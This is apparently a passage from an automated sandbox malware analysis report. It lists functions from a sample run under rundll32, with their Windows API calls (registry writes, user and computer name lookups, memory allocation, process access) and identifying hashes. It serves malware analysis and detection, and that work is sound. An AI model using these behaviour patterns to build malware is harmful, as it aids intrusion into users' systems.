                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                          • String ID:
                                          • API String ID: 2864405449-0
                                          • Opcode ID: 7e2e4bab3667dc69ec37f38e1cbf61e74036510a715f4409b8d3ca9eb6f4153e
                                          • Instruction ID: 9f1cb946436c5b2b7a5baeba2fa2d2fc785d6a5b164fad93d212749a5b5637a9
                                          • Opcode Fuzzy Hash: 7e2e4bab3667dc69ec37f38e1cbf61e74036510a715f4409b8d3ca9eb6f4153e
                                          • Instruction Fuzzy Hash: 4B315071900208BFEB109FA5EC49BAE7BF4EB14766F204594FD15A31E0D7708F989B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B56953 Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,00B5F6B3,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 00B56972
                                          • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 00B569A6
                                          • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 00B569AE
                                          • GetLastError.KERNEL32 ref: 00B569B8
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 00B569D4
                                          • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 00B569ED
                                          • CancelIo.KERNEL32(?), ref: 00B56A02
                                          • CloseHandle.KERNEL32(?), ref: 00B56A12
                                          • GetLastError.KERNEL32 ref: 00B56A1A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                          • String ID:
                                          • API String ID: 4263211335-0
                                          • Opcode ID: 39f06f558799eb2b3e6bf6f8b62feb947aa5800c703e9fe6153be006605ce64c
                                          • Instruction ID: bb059ecea45b15e4ce6a2188623791cb76f2542a503752657c0affbc849fd9c6
                                          • Opcode Fuzzy Hash: 39f06f558799eb2b3e6bf6f8b62feb947aa5800c703e9fe6153be006605ce64c
                                          • Instruction Fuzzy Hash: AD214476900118FFCB119FA5DC48ADE7BB9FB58312B408165FE19E3150DB308A94CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B539E2 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B539EE
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00B53A04
                                          • _snwprintf.NTDLL ref: 00B53A29
                                          • CreateFileMappingW.KERNEL32(000000FF,00B79208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 00B53A45
                                          • GetLastError.KERNEL32 ref: 00B53A57
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00B53A6E
                                          • CloseHandle.KERNEL32(00000000), ref: 00B53A8F
                                          • GetLastError.KERNEL32 ref: 00B53A97
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 150751b5aa379ecc21979deb5df5e06467c4ac3d1c1919e251da6c4bb7fdb6b3
                                          • Instruction ID: 8e31c3671be1db98fe5798907128d0e86f491e661c6570ea3e2dc4afb9184815
                                          • Opcode Fuzzy Hash: 150751b5aa379ecc21979deb5df5e06467c4ac3d1c1919e251da6c4bb7fdb6b3
                                          • Instruction Fuzzy Hash: 9721E773640208BBD721DB68CC09F9E77E9EB84B52F2140A0FA1DF72D0DB709A458B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5B2AD Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(00000000,?,06149A03,?,?,06149A03,?,?,06149A03,?,?,06149A03,?,00000000,00000000,00000000), ref: 00B5B3AB
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B5B3CE
                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 00B5B3D6
                                          • lstrlenW.KERNEL32(00000000,?,06149A03,?,?,06149A03,?,?,06149A03,?,?,06149A03,?,?,06149A03,?), ref: 00B5B421
                                          • memcpy.NTDLL(00000000,?,?,?,?,?,?,00B5980E,?), ref: 00B5B489
                                          • LocalFree.KERNEL32(?,?,?,?,?,00B5980E,?), ref: 00B5B4A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                          • String ID: P
                                          • API String ID: 3649579052-3110715001
                                          • Opcode ID: dcf87bc5d1af79f103ea10a801d7b770bf7161717215e9ef4c820d4c37834dfa
                                          • Instruction ID: 55aff52b026cf6931e5a939f77adcf5d5ab21bf870106eef88987831a377c491
                                          • Opcode Fuzzy Hash: dcf87bc5d1af79f103ea10a801d7b770bf7161717215e9ef4c820d4c37834dfa
                                          • Instruction Fuzzy Hash: AD61407190010EAFDF11EFA9CC88EAE7BF9EF44305B1540A5FA09A7211DB359D49CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6D818 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6D5E6: InterlockedIncrement.KERNEL32(00000018), ref: 00B6D637
                                            • Part of subcall function 00B6D5E6: RtlLeaveCriticalSection.NTDLL(0614C398), ref: 00B6D6C2
                                          • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C,00000000,00000000,?,?,?,00B5E219,?), ref: 00B6D872
                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C,00000000,00000000,?,?,?,00B5E219,?), ref: 00B6D890
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B6D8F8
                                          • lstrlenW.KERNEL32(?), ref: 00B6D96D
                                          • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 00B6D989
                                          • memcpy.NTDLL(00000014,?,00000002), ref: 00B6D9A1
                                            • Part of subcall function 00B51924: RtlLeaveCriticalSection.NTDLL(?), ref: 00B519A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                                          • String ID: o
                                          • API String ID: 2541713525-252678980
                                          • Opcode ID: 04997ffbb5312f298e0f0cc7b07318b70bb6ceb47845dbf3021052acbd543a31
                                          • Instruction ID: 52024aefc0e9d4770ebce473493e001f3d4ae17b53b50fed96b2f98412fdb1ce
                                          • Opcode Fuzzy Hash: 04997ffbb5312f298e0f0cc7b07318b70bb6ceb47845dbf3021052acbd543a31
                                          • Instruction Fuzzy Hash: 1F518D71B40706AFD720DF64C888BAAB7F8FF04705F104569EA59D7291EB78E984CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5984B Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6BAC0: RegCreateKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BAD5
                                            • Part of subcall function 00B6BAC0: lstrlen.KERNEL32(0614B7F0,00000000,00000000,00B7806E,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B6BAFE
                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B59890
                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B598A8
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B5990A
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5991E
                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,?), ref: 00B59970
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B59999
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B599A9
                                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00B599B2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                          • String ID:
                                          • API String ID: 3503961013-0
                                          • Opcode ID: 673d6d7b88348c760a55ce2bd6e8e8910daf4e339b0005cb15e1f4587b678416
                                          • Instruction ID: 75687d2aa459a967ba966814fc590046b1e1198c45d565bdf02e340c76311224
                                          • Opcode Fuzzy Hash: 673d6d7b88348c760a55ce2bd6e8e8910daf4e339b0005cb15e1f4587b678416
                                          • Instruction Fuzzy Hash: DA41A4B5D00119EFDF119FE4DC849EEBBB9FB48315F1044AAEA15A3220D7354A989B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5B175 Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,00B62B68), ref: 00B5B18B
                                          • wsprintfA.USER32 ref: 00B5B1B3
                                          • lstrlen.KERNEL32(?), ref: 00B5B1C2
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • wsprintfA.USER32 ref: 00B5B202
                                          • wsprintfA.USER32 ref: 00B5B237
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B5B244
                                          • memcpy.NTDLL(00000008,00B743E8,00000002,00000000,?,?), ref: 00B5B259
                                          • wsprintfA.USER32 ref: 00B5B27C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                          • String ID:
                                          • API String ID: 2937943280-0
                                          • Opcode ID: 438109b163de108da8a3856e4978c6f6f9dc4c8fa0840f6bdc9f767966e539e1
                                          • Instruction ID: 17fb7463c789b4be6e959ea35c31db08544d77bf49684eac715ef85d60e949ee
                                          • Opcode Fuzzy Hash: 438109b163de108da8a3856e4978c6f6f9dc4c8fa0840f6bdc9f767966e539e1
                                          • Instruction Fuzzy Hash: A7412C71A0020AAFDB14DF98D884EAEB7FDEF44309B1544A5F919E7211EB31EE158B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6FFA5 Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00B6FFCF
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6FFE2
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00B6FFF4
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B56BDA), ref: 00B70018
                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 00B70026
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B7003D
                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 00B7004E
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B56BDA), ref: 00B70074
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 81b930d8b50c061e3e468cb164b7066844b34639e2a9ff809193d466b6f7bd5b
                                          • Instruction ID: 21fad8fa2f075bf2dba5731be591e34307cdf2c80e7212301bca70be047f3c0a
                                          • Opcode Fuzzy Hash: 81b930d8b50c061e3e468cb164b7066844b34639e2a9ff809193d466b6f7bd5b
                                          • Instruction Fuzzy Hash: B3314FB6A10109EFDB10DFB4DD859AEBBF9FB44310B148869E919D3210DB34DE84DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B66378 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?), ref: 00B6639C
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B663AE
                                          • wcstombs.NTDLL ref: 00B663BC
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?), ref: 00B663E0
                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B663F5
                                          • mbstowcs.NTDLL ref: 00B66402
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?,?), ref: 00B66414
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?,?), ref: 00B6642E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                          • String ID:
                                          • API String ID: 316328430-0
                                          • Opcode ID: ce6f286bc87af082a491cd65bb00f63ccd7b62fe549cb4144a7122b28261c4bc
                                          • Instruction ID: e652732ed93cbeaa69cf400c6b53dd6c2ff92a5cbe170a9c635fee7d994320ba
                                          • Opcode Fuzzy Hash: ce6f286bc87af082a491cd65bb00f63ccd7b62fe549cb4144a7122b28261c4bc
                                          • Instruction Fuzzy Hash: 9F216D3190020AFFDF119FA4EC48E9A7BB9EF44315F104066FA09E3161DF7599A4DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B57574 Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00B6C387,00000000,00000000,00B79460,?,?,00B61B32,00B6C387,00000000,00B6C387,00B79440), ref: 00B57587
                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00B57595
                                          • wsprintfA.USER32 ref: 00B575B1
                                          • RegCreateKeyA.ADVAPI32(80000001,00B79440,00000000), ref: 00B575C9
                                          • lstrlen.KERNEL32(?), ref: 00B575D8
                                          • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 00B575E6
                                          • RegCloseKey.ADVAPI32(?), ref: 00B575F1
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B57600
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                          • String ID:
                                          • API String ID: 1575615994-0
                                          • Opcode ID: d91fe550d3cd89f91616200778f245643631067cecadb7e5a1f1f64677c20b76
                                          • Instruction ID: 3be3cef2d55c53ea79323cc02d24b70dbad2ba1fd658449c2ab1406378c077b0
                                          • Opcode Fuzzy Hash: d91fe550d3cd89f91616200778f245643631067cecadb7e5a1f1f64677c20b76
                                          • Instruction Fuzzy Hash: E8115B72240108BFEB015B94EC88EAA3B7DEB49715F100061FA0997260EF729D949B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6CDA3 Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00B6CDAF
                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00B6CDCD
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B6CDD5
                                          • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 00B6CDF3
                                          • GetLastError.KERNEL32 ref: 00B6CE07
                                          • RegCloseKey.ADVAPI32(?), ref: 00B6CE12
                                          • CloseHandle.KERNEL32(00000000), ref: 00B6CE19
                                          • GetLastError.KERNEL32 ref: 00B6CE21
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                          • String ID:
                                          • API String ID: 3822162776-0
                                          • Opcode ID: d53ff4fb043452b0bcc4cdd4eeef6e5057898be277deb70672ed5a7ab889aa2a
                                          • Instruction ID: 73fba043ab8e1eea468160ff5e0754b99a65c6be1f5f78e4f39f8271ce12a484
                                          • Opcode Fuzzy Hash: d53ff4fb043452b0bcc4cdd4eeef6e5057898be277deb70672ed5a7ab889aa2a
                                          • Instruction Fuzzy Hash: 98115E76140208FFDB015FA0DC48F6A3FB9EB48362F104020FA1AD6260DF36D9A4DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6814E Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ee1bf583df3bfd9f621c8cd49b82cb9d453c277a880a4695c3e4f82a6dbcef08
                                          • Instruction ID: d80e1feb5ae9edbc92608c8acd6c63f86e6f7b6fb4b9d063c3d99b10d4bf27c6
                                          • Opcode Fuzzy Hash: ee1bf583df3bfd9f621c8cd49b82cb9d453c277a880a4695c3e4f82a6dbcef08
                                          • Instruction Fuzzy Hash: 2AB13371C0021AEFDF21DB94CC48AEEBBB8EF09315F0441A1E914B7260DB399E95DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B64ACA Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCommandLineA.KERNEL32(00B750F8,00000038,00B6600B,00000000,76DDF5B0,00B6339A,?,00000001,?,?,?,?,?,?,?,00B5BF69), ref: 00B64ADB
                                          • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B64AEC
                                            • Part of subcall function 00B53997: lstrlen.KERNEL32(?,00000000,76D86980,00000000,00B6780A,?), ref: 00B539A0
                                            • Part of subcall function 00B53997: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B539C3
                                            • Part of subcall function 00B53997: memset.NTDLL ref: 00B539D2
                                          • ExitProcess.KERNEL32 ref: 00B64CCE
                                            • Part of subcall function 00B652C3: StrChrA.SHLWAPI(?,?,748FD3B0,0614C304,00000000,?,00B5CE0C,?,00000020,0614C304), ref: 00B652E8
                                            • Part of subcall function 00B652C3: StrTrimA.SHLWAPI(?,00B74FC4,00000000,?,00B5CE0C,?,00000020,0614C304), ref: 00B65307
                                            • Part of subcall function 00B652C3: StrChrA.SHLWAPI(?,?,?,00B5CE0C,?,00000020,0614C304), ref: 00B65313
                                          • lstrcmp.KERNEL32(?,?), ref: 00B64B5A
                                          • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B64B72
                                            • Part of subcall function 00B69287: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0614B7F0,?,?,00B6BB0E,0000003A,0614B7F0,?,?,?,00B56B9D,00000001,00000000), ref: 00B692C7
                                            • Part of subcall function 00B69287: CloseHandle.KERNEL32(000000FF,?,?,00B6BB0E,0000003A,0614B7F0,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B692D2
                                          • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B64BE4
                                          • lstrcmp.KERNEL32(?,?), ref: 00B64BFD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 739714153-0
                                          • Opcode ID: 46c78b63d36685bd70f2661c7724f6923b17744999f94c146985c106b21a90a8
                                          • Instruction ID: ece7899b318d4c5eb53614691230bb9ee37367d9822c7a126ec84a2c81446fa4
                                          • Opcode Fuzzy Hash: 46c78b63d36685bd70f2661c7724f6923b17744999f94c146985c106b21a90a8
                                          • Instruction Fuzzy Hash: 31517871901619AFDF14ABA0CC89EAEBBF9EF08701F0404A5F605F7260DB799985CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B54687 Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 00B546B2
                                          • StrTrimA.SHLWAPI(00000000,?), ref: 00B546CF
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B54702
                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00B5472B
                                          • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 00B547F0
                                            • Part of subcall function 00B53997: lstrlen.KERNEL32(?,00000000,76D86980,00000000,00B6780A,?), ref: 00B539A0
                                            • Part of subcall function 00B53997: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B539C3
                                            • Part of subcall function 00B53997: memset.NTDLL ref: 00B539D2
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B547A1
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B547D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                          • String ID:
                                          • API String ID: 239510280-0
                                          • Opcode ID: c2ab643bd9a1bd68c254a1625c2752693ed014d6421b4fab448cb4af3c5c6af6
                                          • Instruction ID: 4551d0d4a87193eec96f074504bde378983dbb77d7d44ea35e9f0c008ab1aa72
                                          • Opcode Fuzzy Hash: c2ab643bd9a1bd68c254a1625c2752693ed014d6421b4fab448cb4af3c5c6af6
                                          • Instruction Fuzzy Hash: 5D41A531600205BBEB125BA4DC85FAE7AF9EB4A746F1000E5FA09A7290DF758ED4D750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6B4CF Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000000,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B529
                                          • lstrlen.KERNEL32(?,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B547
                                          • RtlAllocateHeap.NTDLL(00000000,76D86985,?), ref: 00B6B573
                                          • memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B58A
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B6B59D
                                          • memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B5AC
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?), ref: 00B6B610
                                            • Part of subcall function 00B51924: RtlLeaveCriticalSection.NTDLL(?), ref: 00B519A1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                          • String ID:
                                          • API String ID: 1635816815-0
                                          • Opcode ID: 2bcf99cb72b42b44b5cadc8c7f681de629ecf606bf99a398a725ca5a7aefc8e9
                                          • Instruction ID: 5e9b2031d8903d70258a20434844b90c895ce5d592cbe2b068729c5ddd7becbb
                                          • Opcode Fuzzy Hash: 2bcf99cb72b42b44b5cadc8c7f681de629ecf606bf99a398a725ca5a7aefc8e9
                                          • Instruction Fuzzy Hash: CB415C31900214ABDF219FA8DC94EDEBBF5EF14350F0145A5F90AE7161DB749E90DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B64F64 Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlImageNtHeader.NTDLL ref: 00B64F8D
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B64FD0
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B64FEB
                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 00B65041
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 00B6509D
                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 00B650AB
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B650B6
                                            • Part of subcall function 00B52F6E: RegCreateKeyA.ADVAPI32(80000001,?,-00000005), ref: 00B52F82
                                            • Part of subcall function 00B52F6E: memcpy.NTDLL(00000000,00000001,-00000005,-00000005,-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FAB
                                            • Part of subcall function 00B52F6E: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,-00000005), ref: 00B52FD4
                                            • Part of subcall function 00B52F6E: RegCloseKey.ADVAPI32(-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FFF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                          • String ID:
                                          • API String ID: 3181710096-0
                                          • Opcode ID: 32dbf6cf113e38ffacbb2ca0f016d11df311f2b872c05985a645ba58043e105e
                                          • Instruction ID: 4d123e6e6754689da399548100c7b26a07a67f1f2f3dc574ae2ea2a25cffcd75
                                          • Opcode Fuzzy Hash: 32dbf6cf113e38ffacbb2ca0f016d11df311f2b872c05985a645ba58043e105e
                                          • Instruction Fuzzy Hash: 80418832200605ABEB319F24DC88F6A3BE9EB00741F1500A4F90A97261DF75DDA5CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5EF43 Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00B5EF84
                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00B5EFB2
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00B5EFF7
